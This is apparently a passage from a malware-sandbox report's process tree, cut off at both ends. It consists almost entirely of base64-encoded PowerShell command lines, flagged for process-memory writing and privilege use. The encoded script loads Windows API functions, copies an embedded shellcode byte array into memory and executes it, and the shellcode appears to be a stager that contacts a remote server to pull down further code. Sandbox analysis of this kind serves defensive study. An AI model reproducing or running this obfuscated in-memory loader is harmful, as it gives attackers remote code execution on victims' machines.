BaADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA3ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABiAFkARgAgAD0AIAAwADsAZgBvAHIAKAAkAFIAVwA9ADAAOwAkAFIAVwAgAC0AbABlACgAJABOAEcALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAUgBXACsAKwApAHsAJAB0AFoAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAUgBXACkALAAgACQATgBHAFsAJABSAFcAXQAsACAAMQApAH0AOwAkAHQAWgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABNAEYALAAgADAAeAAxADAAMAA3ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABiAFkARgApADsAJAB3AE0AQwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB0AFoAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJAB3AE0AQwAsACQATQBGACwAMAAsADAALAAwACkAOwAnADsAJABaAEEAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFQAaQApACkAOwAkAFUARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAEkAPQAiAFcAaQBuAGQAbwB3'+'AHMAIgA7ACQATABmAFgAIAA9ACAAIgBDADoAXAAkAEIASQBcAHoAVABFAHMAVgBHAFMAaABcACQAQgBJACQAVQBHAFwAdgAxAC4AMABcACQAVQBHACIAOwAkAEwAZgBYACAAPQAgACQATABmAFgALgByAGUAcABsAGEAYwBlACgAIgB6AFQARQBzACIALAAgACIAcwB5AHMAIgApADsAJABMAGYAWAAgAD0AIAAkAEwAZgBYAC4AcgBlAHAAbABhAGMAZQAoACIAVgBHAFMAaAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAFIAawBwACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAFIAawBwACcAKQB7ACQAVQBHAD0AIAAkAEwAZgBYAH0AOwAkAEkAdAA9ACIAIAAkAFUARwAgAEoASgBDACAAJABaAEEAIgA7ACQASQB0AD0AJABJAHQALgByAGUAcABsAGEAYwBlACgAIgBKAEoAQwAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAEkAdAA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABUAGkAPQAnACQAQgBvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABiAFkARgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQATgBHAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADgAYgAsAH0ANwAyACwAfQAyADgALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQA1ADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9AGUAOAAsAH0AMwBlACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0AGQALAB9ADYAZgAsAH0ANwBhACwAfQA2ADkALAB9ADYAYwAsAH0ANgBjACwAfQA2ADEALAB9ADIAZgAsAH0AMwA1ACwAfQAyAGUALAB9ADMAMAAsAH0AMgAwACwAfQAyADgALAB9ADUANwAsAH0ANgA5ACwAfQA2AGUALAB9ADYANAAsAH0ANgBmACwAfQA3ADcALAB9ADcAMwAsAH0AMgAwACwAfQA0AGUALAB9ADUANAAsAH0AMgAwACwAfQAzADYALAB9ADIAZQAsAH0AMwAxACwAfQAzAGIALAB9ADIAMAAsAH0ANQA0ACwAfQA3ADIALAB9ADYAOQAsAH0ANgA0ACwAfQA2ADUALAB9ADYAZQAsAH0ANwA0ACwAfQAyAGYALAB9ADMANwAsAH0AMgBlACwAfQAzADAALAB9ADMAYgAsAH0AMgAwACwAfQA3ADIALAB9ADcANgAsAH0AMwBhACwAfQAzADEALAB9ADMAMQAsAH0AMgBlACwAfQAzADAALAB9ADIAOQAsAH0AMgAwACwAfQA2AGMALAB9ADYAOQAsAH0ANgBiACwAfQA2ADUALAB9ADIAMAAsAH0ANAA3ACwAfQA2ADUALAB9ADYAMwAsAH0ANgBiACwAfQA2AGYALAB9ADAAMAAsAH0ANgA4ACwAfQAzAGEALAB9ADUANgAsAH0ANwA5ACwAfQBhADcALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANgBhACwAfQAwADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADUAYgAsAH0AMQAxACwAfQAwADAALAB9ADAAMAAsAH0AZQA4ACwAfQAwADcALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAZgAsAH0ANgA5ACwAfQA1ADAALAB9ADMANQAsAH0ANQAxACwAfQA2ADgALAB9ADQAYQAsAH0ANAAyACwAfQA1ADYALAB9ADcANgAsAH0ANwAwACwAfQA2ADUALAB9ADUAOQAsAH0ANgA1ACwAfQAzADUALAB9ADYAYwAsAH0AMwA2ACwAfQA3ADgALAB9ADcAOQAsAH0AMwAzACwAfQA2AGQALAB9ADQANQAsAH0ANgA3ACwAfQA2ADQALAB9ADUANwAsAH0AMwA2ACwAfQA1AGEALAB9ADcAMwAsAH0ANwA2ACwAfQAzADkALAB9ADQANQAsAH0ANgBiACwAfQA2AGEALAB9ADMAMAAsAH0AMgBkACwAfQA2AGUALAB9ADYAMQAsAH0ANAAzACwAfQAzADQALAB9ADYAZAAsAH0ANwAwACwAfQA2AGYALAB9ADQANwAsAH0ANAA1ACwAfQAzADEALAB9ADcAOQAsAH0ANQA1ACwAfQA2AGYALAB9ADYANQAsAH0ANwAxACwAfQA0ADgALAB9ADUAYQAsAH0ANAAxACwAfQA1ADMALAB9ADYANwAsAH0ANgBjACwAfQAzADcALAB9ADcAYQAsAH0ANgBkACwAfQA3ADUALAB9ADYAZQAsAH0ANwA2ACwAfQA1ADAALAB9ADUANAAsAH0ANgA3ACwAfQA1ADcALAB9ADMAOAAsAH0ANABkACwAfQA0ADIALAB9ADUAMQAsAH0ANABhACwAfQAzADUALAB9ADMANwAsAH0ANgBkACwAfQA0ADEALAB9ADQANgAsAH0ANAAxACwAfQA1AGEALAB9ADQAMwAsAH0ANABlACwAfQA0ADIALAB9ADcAMgAsAH0ANgA3ACwAfQA2ADIALAB9ADYAYgAsAH0ANgBmACwAfQA0ADgALAB9ADYAOQAsAH0ANQA2ACwAfQA3ADcALAB9ADcAYQAsAH0ANgBlACwAfQAzADYALAB9ADYAYgAsAH0ANgBiACwAfQA2AGQALAB9ADUAMgAsAH0AMwA0ACwAfQA2ADIALAB9ADQAZAAsAH0ANAAxACwAfQA2AGEALAB9ADYAMQAsAH0ANQA3ACwAfQAyAGQALAB9ADYAOAAsAH0AMwAxACwAfQA0ADkALAB9ADMANgAsAH0ANwBhACwAfQAzADUALAB9ADUAMwAsAH0ANgAzACwAfQA0AGIALAB9ADUANgAsAH0ANgBkACwAfQA3AGEALAB9ADIAZAAsAH0ANwAzACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADQALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9AGUAOAAsAH0ANABhACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0AMAAwACwAfQAwADAALAB9ADQAMAAsAH0AMAAwACwAfQA1ADMALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADUAMwAsAH0AOAA5ACwAfQBlADcALAB9ADUANwAsAH0ANgA4ACwAfQAwADAALAB9ADIAMAAsAH0AMAAwACwAfQAwADAALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADEAMgAsAH0AOQA2ACwAfQA4ADkALAB9AGUAMgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9AGMAZgAsAH0AOABiACwAfQAwADcALAB9ADAAMQAsAH0AYwAzACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQBlADUALAB9ADUAOAAsAH0AYwAzACwAfQA1AGYALAB9AGUAOAAsAH0ANgBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAzADEALAB9ADMAOQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMQAsAH0AMwA2ACwAfQAzADgALAB9ADIAZQAsAH0AMwAxACwAfQAyAGUALAB9ADMAMQAsAH0AMwAwACwAfQAzADUALAB9ADAAMAAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHQAWgA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQgBvACAALQBOAGEAbQBlACAAIgBYAEQAIgAgAC0AbgBhAG0AZQBzACAAaABVAEIAOwAkAHQAWgA9ACQAdABaAC4AcgBlAHAAbABhAGMAZQAoACIAaABVAEIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQATgBHACAAPQAgACQATgBHAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBMAGoAaABQAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIATABqAGgAUAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBLAD0AMAB4ADEAMAAwADcAOwBpAGYAIAAoACQATgBHAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADcAKQB7ACQASwBLAD0AJABOAEcALgBMAH0AOwAkAE0ARgA9ACQAdABaADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA3ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABiAFkARgAgAD0AIAAwADsAZgBvAHIAKAAkAFIAVwA9ADAAOwAkAFIAVwAgAC0AbABlACgAJABOAEcALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAUgBXACsAKwApAHsAJAB0AFoAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAUgBXACkALAAgACQATgBHAFsAJABSAFcAXQAsACAAMQApAH0AOwAkAHQAWgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABNAEYALAAgADAAeAAxADAAMAA3ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABiAFkARgApADsAJAB3AE0AQwA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB0AFoAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwB1AGkAbgB0ADMAMgBdAFsAaQBuAHQAXQAwACwAJAB3AE0AQwAsACQATQBGACwAMAAsADAALAAwACkAOwAnADsAJABaAEEAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAFQAaQApACkAOwAkAFUARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAEkAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQATABmAFgAIAA9ACAAIgBDADoAXAAkAEIASQBcAHoAVABFAHMAVgBHAFMAaABcACQAQgBJACQAVQBHAFwAdgAxAC4AMABcACQAVQBHACIAOwAkAEwAZgBYACAAPQAgACQATABmAFgALgByAGUAcABsAGEAYwBlACgAIgB6AFQARQBzACIALAAgACIAcwB5AHMAIgApADsAJABMAGYAWAAgAD0AIAAkAEwAZgBYAC4AcgBlAHAAbABhAGMAZQAoACIAVgBHAFMAaAAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAFIAawBwACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAFIAawBwACcAKQB7ACQAVQBHAD0AIAAkAEwAZgBYAH0AOwAkAEkAdAA9ACIAIAAkAFUARwAgAEoASgBDACAAJABaAEEAIgA7ACQASQB0AD0AJABJAHQALgByAGUAcABsAGEAYwBlACgAIgBKAEoAQwAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAEkAdAA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABCAG8APQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABiAFkARgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAE4ARwA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0AOABiACwAfQA1ADgALAB9ADIAMAAsAH0ANQAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQBlADgALAB9ADMAZQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANABkACwAfQA2AGYALAB9ADcAYQAsAH0ANgA5ACwAfQA2AGMALAB9ADYAYwAsAH0ANgAxACwAfQAyAGYALAB9ADMANQAsAH0AMgBlACwAfQAzADAALAB9ADIAMAAsAH0AMgA4ACwAfQA1ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADQALAB9ADYAZgAsAH0ANwA3ACwAfQA3ADMALAB9ADIAMAAsAH0ANABlACwAfQA1ADQALAB9ADIAMAAsAH0AMwA2ACwAfQAyAGUALAB9ADMAMQAsAH0AMwBiACwAfQAyADAALAB9ADUANAAsAH0ANwAyACwAfQA2ADkALAB9ADYANAAsAH0ANgA1ACwAfQA2AGUALAB9ADcANAAsAH0AMgBmACwAfQAzADcALAB9ADIAZQAsAH0AMwAwACwAfQAzAGIALAB9ADIAMAAsAH0ANwAyACwAfQA3ADYALAB9ADMAYQAsAH0AMwAxACwAfQAzADEALAB9ADIAZQAsAH0AMwAwACwAfQAyADkALAB9ADIAMAAsAH0ANgBjACwAfQA2ADkALAB9ADYAYgAsAH0ANgA1ACwAfQAyADAALAB9ADQANwAsAH0ANgA1ACwAfQA2ADMALAB9ADYAYgAsAH0ANgBmACwAfQAwADAALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQA1AGIALAB9ADEAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0AMAA3ACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADYAOQAsAH0ANQAwACwAfQAzADUALAB9ADUAMQAsAH0ANgA4ACwAfQA0AGEALAB9ADQAMgAsAH0ANQA2ACwAfQA3ADYALAB9ADcAMAAsAH0ANgA1ACwAfQA1ADkALAB9ADYANQAsAH0AMwA1ACwAfQA2AGMALAB9ADMANgAsAH0ANwA4ACwAfQA3ADkALAB9ADMAMwAsAH0ANgBkACwAfQA0ADUALAB9ADYANwAsAH0ANgA0ACwAfQA1ADcALAB9ADMANgAsAH0ANQBhACwAfQA3ADMALAB9ADcANgAsAH0AMwA5ACwAfQA0ADUALAB9ADYAYgAsAH0ANgBhACwAf